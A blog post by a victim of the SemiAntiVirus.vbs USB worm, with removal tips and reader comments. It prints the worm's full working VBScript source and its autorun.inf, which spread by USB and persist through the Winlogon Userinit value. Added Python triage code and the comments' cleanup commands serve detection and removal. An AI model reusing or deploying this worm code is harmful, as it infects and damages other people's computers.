Thursday, January 22, 2009

Dear SemiAntiVirus.vbs, you are gladly welcome to my machine!

Well, I'm proud to announce that I do not use an antivirus guard or a virus removal tool or anything of that kind. On my computer, it is all about manual virus removal, or rather prevention.

But yesterday, I came across this damn thing, which does awful things like changing the folder settings. I had set the folder options to show hidden files, but within a few seconds it was changed back to "do not show hidden files and folders".

So, after all, my computer too was infected. It was a quick virus/worm, I'd say. I was trying to format a USB drive and suddenly, it was there!!

Here is the script if any one is interested.


This is the autorun file (autorun.inf, dropped at the root of the USB drive):

[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: formatting an affected USB drive from Windows Explorer is not a safe way to get rid of this, because the autorun.inf hooks the Format... verb as well. As the file above shows, the script is launched by each of these actions on the drive:

1. Opening it (double-click; the open= line and the shell\open verb)
2. Using the AutoPlay entry (the shell\Auto verb)
3. Exploring it (right-click and select Explore)
4. Searching for the files saved on the USB drive (right-click, Search...)
5. Formatting it (right-click, Format...)

Interesting!!
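Added example (not code from the original post or from the script's author): a small Python triage routine that parses an autorun.inf and lists every key that can make Windows run something, so the actions above fall out of the file itself instead of being read off by hand. The sample input is the autorun.inf printed above; the lists of script hosts and script extensions, and the rule that flags them, are this example's own heuristics rather than a Windows specification.

```python
"""Enumerate the launch points in an autorun.inf and flag script-host abuse.

Added example, not code from the original post or from the script's author.
The sample below is the autorun.inf printed on the page; the classification
rules are this example's own heuristics.
"""
import ntpath
import re

# Constructed sample: the autorun.inf that SemiAntiVirus.vbs drops, as shown on the page.
SAMPLE_AUTORUN_INF = r"""[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs
"""

# Interpreters that have no business in a removable drive's autorun.inf (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe",
                "rundll32.exe", "powershell.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".hta"}

_VERB_COMMAND = re.compile(r"shell\\(.+)\\command")


def parse_autorun(text):
    """Return the [autorun] section as an ordered list of (key, value).

    Keys are lower-cased for comparison; values keep their case.  Other
    sections (e.g. [DeviceInstall]) and ';' comment lines are skipped.
    """
    entries, in_autorun = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries.append((key.strip().lower(), value.strip()))
    return entries


def launch_points(entries):
    """Yield (trigger, command) for every key that makes Windows run something.

    'open' / 'shellexecute' fire from AutoPlay or a double-click on the drive;
    'shell\\<verb>\\command' fires when <verb> is chosen from the drive's
    right-click menu (Explore, Search..., Format... and so on).
    """
    for key, value in entries:
        if key in ("open", "shellexecute"):
            yield key, value
            continue
        match = _VERB_COMMAND.fullmatch(key)
        if match:
            yield "shell\\" + match.group(1), value


def _first_token(command):
    return command.split()[0].strip('"') if command.split() else ""


def assess(text):
    """Return [(trigger, command, reasons)]; an empty reasons list means nothing odd."""
    findings = []
    for trigger, command in launch_points(parse_autorun(text)):
        reasons = []
        exe = ntpath.basename(_first_token(command)).lower()
        if exe in SCRIPT_HOSTS:
            reasons.append("runs through script host " + exe)
        for token in command.split():
            bare = token.strip('"')
            if ntpath.splitext(bare)[1].lower() in SCRIPT_EXTS:
                where = "" if ntpath.isabs(bare) else " (relative path, resolved from the drive root)"
                reasons.append("passes script file " + bare + where)
        findings.append((trigger, command, reasons))
    return findings


if __name__ == "__main__":
    for trigger, command, reasons in assess(SAMPLE_AUTORUN_INF):
        flag = "SUSPICIOUS" if reasons else "ok"
        print(f"{flag:10} {trigger:16} -> {command}")
        for reason in reasons:
            print(f"{'':10} {'':16}    {reason}")
```

Running it on the sample prints six launch points (open= plus the five shell verbs; open= and shell\open both cover the double-click path), every one flagged because it hands SemiAntiVirus.vbs, a relative name resolved from the drive root, to wscript.exe. An autorun.inf that only sets icon= and label= yields no launch points, which is what a clean driver CD or USB stick normally looks like.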

The actual virus script, which can be found at c:\windows\system32\semiantivirus.vbs (the script also copies itself to the root of every removable drive it sees, next to the autorun.inf above, and marks both files hidden and system):

To tell the truth, I do not understand a single line of this code (except the italicised part, which has a good sense of humour), but I hope it will help the computer geeks find a solution.

Important: please do not use this information for unethical purposes

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"

Count=Drv.DriveType

Do

delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 2000
end if


loop while Count<>1


sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub




I am still trying to find a way to remove this. The .vbs file cannot be deleted, as it says that it is being used by another program.

Mm, and the best part is that it does not allow another AVG to be installed on the machine. I tried to install Avast, but the moment the setup.exe loads, the machine restarts.

Cool, keep in touch. I'll post how to remove it if I find a way.

Until then, have fun!!

PS: if you know any way to remove this, you are more than welcome.
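Two places in the script explain why the file keeps coming back. The two-line Shells.RegWrite ending in SemiAntiVirus.vbs appends "wscript.exe <system32>\SemiAntiVirus.vbs" to the Winlogon Userinit value, so the system32 copy is started again at every logon no matter how many USB copies are deleted. And because Count is the DriveType of the drive the script was launched from and the main body is a Do ... Loop While Count<>1, a copy started from a fixed drive (type 2) never exits: every two seconds it re-runs the whole delete-and-drop cycle (calling GetFolder on every drive, empty A: and CD drives included, before the A: check), which is why the file shows as in use and why a freshly inserted stick is infected at once. Added example (not code from the original post or from the script's author): a Python check for that persistence value and a list of the paths the script writes. The registry path and file names come from the RegWrite, crvbs and crinf calls above; the sample values, the "clean" expectation and the parsing are this example's own assumptions. The live registry is read only on Windows (via winreg); elsewhere the functions run on the embedded sample.

```python
"""Check the logon persistence SemiAntiVirus.vbs installs and list what it drops.

Added example, not code from the original post or from the script's author.
Registry value and file names follow the script's RegWrite/crvbs/crinf calls;
the sample values and the 'clean' expectation are this example's assumptions.
"""
import ntpath
import sys

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample: what the script's RegWrite produces when SystemDir is
# C:\WINDOWS\system32 (a default Windows XP install).
INFECTED_USERINIT = (r"C:\WINDOWS\system32\userinit.exe,"
                     r"C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\SemiAntiVirus.vbs")
CLEAN_USERINIT = r"C:\WINDOWS\system32\userinit.exe,"


def parse_userinit(value):
    """Split a Userinit value into its comma-separated commands; Winlogon runs each at logon."""
    return [part.strip() for part in value.split(",") if part.strip()]


def _program(entry):
    return ntpath.basename(entry.split()[0].strip('"')).lower()


def rogue_userinit_entries(value):
    """Every entry that is not a bare userinit.exe: each of these runs at every logon."""
    return [e for e in parse_userinit(value)
            if _program(e) != "userinit.exe" or len(e.split()) != 1]


def repaired_userinit(value, system_dir=r"C:\WINDOWS\system32"):
    """The value to write back: the genuine userinit.exe entry only, trailing comma kept."""
    for entry in parse_userinit(value):
        if _program(entry) == "userinit.exe" and len(entry.split()) == 1:
            return entry + ","
    return ntpath.join(system_dir, "userinit.exe") + ","


def dropped_files(system_dir, removable_roots):
    """Paths the script writes: the system32 copy (crvbs SystemDir) plus, per
    removable drive, a script copy (crvbs Drives.Path) and an autorun.inf (crinf)."""
    paths = [ntpath.join(system_dir, "SemiAntiVirus.vbs")]
    for root in removable_roots:
        paths.append(ntpath.join(root, "SemiAntiVirus.vbs"))
        paths.append(ntpath.join(root, "autorun.inf"))
    return paths


def read_live_userinit():
    """HKLM\\...\\Winlogon\\Userinit from the live registry; None when not on Windows."""
    if sys.platform != "win32":
        return None
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        value, _kind = winreg.QueryValueEx(key, "Userinit")
    return value


if __name__ == "__main__":
    value = read_live_userinit() or INFECTED_USERINIT
    rogue = rogue_userinit_entries(value)
    print("Userinit :", value)
    print("rogue    :", rogue or "none")
    if rogue:
        print(f'repair   : reg add "HKLM\\{WINLOGON_KEY}" /v Userinit /d "{repaired_userinit(value)}" /f')
    for path in dropped_files(r"C:\WINDOWS\system32", ["E:\\"]):
        print("check    :", path)
```

The order that follows from the script: write the repaired Userinit value first (the printed reg add line), then end the running wscript.exe so the looping system32 copy stops re-dropping files, then clear the attributes it set with Attributes = -1 (hidden and system at least) on each listed path and delete it. Deleting the USB copies first only gets them recreated two seconds later.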



21 comments:

  1. Yuho!! There are many things coming in. The IE title bar is changed to "LRI internet explorer". (If you look at the virus script carefully you can see more.) Hehe, I feel like I'm learning how to read a virus script.
  2. Thanks for putting the code on your blog, because I'm pretty much interested in such coding stuff. Now I'm checking it.
  3. You are welcome, brother!! Have a look; yeah, it is pretty interesting!
  4. Thanks for the information!
    I never had the idea of the Format thing. It looks like Windows Explorer is very very unsafe.
    Use the command prompt (cmd.exe) to format disks, rather than using Windows Explorer. It's the safe option.
    Eg:
    format e: /fs:fat32 /v deeps_usb /x
    For more info:
    format /?

    ---

    I read your script. It looks like it has some basic antivirus capability, but it itself acts as a virus. Looks like this baby doesn't like to coexist with other viruses.

    Open a command prompt and enter the following lines one after one. (You can copy-paste)

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f

    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f

    For more information, try:
    reg
    reg add /?

  5. One more thing:
    Open a command prompt, enter the following commands one after one:
    c:
    cd\
    attrib -s -h autorun.inf
    attrib -s -h semiantivirus.vbs
    d:
    cd\
    attrib -s -h autorun.inf
    attrib -s -h semiantivirus.vbs

    Repeat the procedure for all your disks including removable and floppy disks, but not CD/ DVD. And then,

    cd %systemroot%\system32
    attrib -s -h semiantivirus.vbs

    cd ..
    attrib -s -h semiantivirus.vbs

    Now you should be able to navigate through the Windows Explorer and delete these files. When using Windows Explorer, consider these instructions.

  6. @ shaakunthala(with regard to the following commands)

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f

    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f


    I have already changed the home page manually in IE settings and tried to change the title bar using the command prompt. But changing the title bar of IE is not possible; it says that the system cannot find the path specified.

    So I tried to use Registry Editor to edit it. To my dismay, there was no entry called HKCU\Software\Microsoft\Internet Explorer\Main\Window Title
    Under Main, there are only 3 entries. Namely
    ErrorThresholds
    FeatureControl
    and
    UrlTemplate

    Check the virus code.

    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
    I think this has something to do with it.

    Windows is not at all safe, it seems!!

    (With regard to deleting the virus files)
    There are no files on my machine now. I have deleted them all. Only after deleting did I get this annoying pop-up at start-up.
  7. I had made a mistake in Registry Editor. Hehehe, now all the things are working properly. Thanks for the help.
  8. Hi Deep, it's me, Rajkumar.
    Actually it's not a virus; it's like an antivirus, and it doesn't let the USB virus attack the computer.
    You can use it in a more secure way than any other antivirus.
    Rajkumar
  9. @Anonymous (Rajkumar),
    Anything that runs and spreads without your proper permission is potentially a virus.

  10. Oh, sorry for that.
    But as I told you, I had made it for my personal use.
    I don't know how it transferred.
    Neither have I put it on the net.
    I'm from Nepal and I don't know how it transferred to Sri Lanka.
    But sorry for that.
  11. No buddy, no need to say sorry. :)

    There are some auto replicating scripts that show up as anti-virus programs. Most of the time these scripts are adware. They do minor changes in your system such as changing your Internet Explorer home page and likewise.

  12. @Anonymous

    Hey, no need to say sorry. When I was writing the post, I did some research with the data provided in the disclaimer part of the script. It led me to this school as the place of origin of the virus.

    http://www.glocalnepal.com/lrischool

    So, I already knew that it's from Nepal ;-P

    Well, the browser name still changes to LRI if you run this on a machine. It means to me that the original script itself has come to

    Sri Lanka
    Australia
    India
    Saudi Arabia
    Sao Paulo
    USA
    Singapore
    Hefa etc. etc., according to my web analyzer's data.

    And yes, I agree with you ශාකුන්තල: anything that runs and spreads without your proper permission is potentially a virus, and that is why people from all over the world Google to find a way to remove it.

    You may have created it for your personal use; however, it has leaked and is now affecting a lot of computers in many countries.
  13. OK, use a custom kernel compiled by yourself which disables the USB ports, or add extra protection for /dev/sdb*.
  14. @Rajkumar -- your virus script is a stupid idea.

    I got a version of it. I think it's all over the world.

    http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403

    Don't screw up other people's computers!
  15. Well, he's just a kid.
    Taking into account where he lives and his age, he's brilliant.

    I can feel the way he thinks, as I have also passed that age.

    Giving him some helping hand with some sociological aspects, law and ethics as well would eventually build an ethical hacker. :-)

  16. Agree with shaakunthala on the comment on David.
  17. @David Zetland: You said that it's everywhere... look in your link.

    http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403

    Look in the function

    sub delt(fPath, fName, kil)
    dim fSys, Delet, Wri, raj

    Raj is my name, and I have declared it as my variable.
    He is a cheater and copied my code.
    Haha

    Rajkumar
  18. @Rajkumar

    That wscript.exe 'no disk' error is caused because maybe you did not keep a check for filtering and preventing 'A:' (floppy infection), or the filter code in your script is not working. It happened to me too once in my script, and it turned out to be the script trying to find and infect the floppy device, which of course is never ready these days.
    Make sure you add the floppy filter properly.
    ____________________________________
    Here is a virus guide. It spreads from pen drives and open network drives.

    http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
    ____________________________________

    Well, most people think there are no hackers in Nepal. Well, I'd like to proudly state that they are wrong. I'm one of the Nepalese hackers, and so is this script writer.
  19. Visit this:

    http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html

  20. @anonymous: Well, that's not my problem. I don't think floppies are used nowadays; I don't use them, so I haven't used a filter for the floppy. But it's easy; I need to add 2-3 lines.
    And also about Nepali hackers and script writers, I don't think they are like other hackers. I'm Nepali too and make scripts and software; they just like to copy it without reference, and I don't like it. For example, this was my own creation. I have seen many of them copying it, editing it, but no reference. Just some of my variables have not been edited yet, and that's the proof.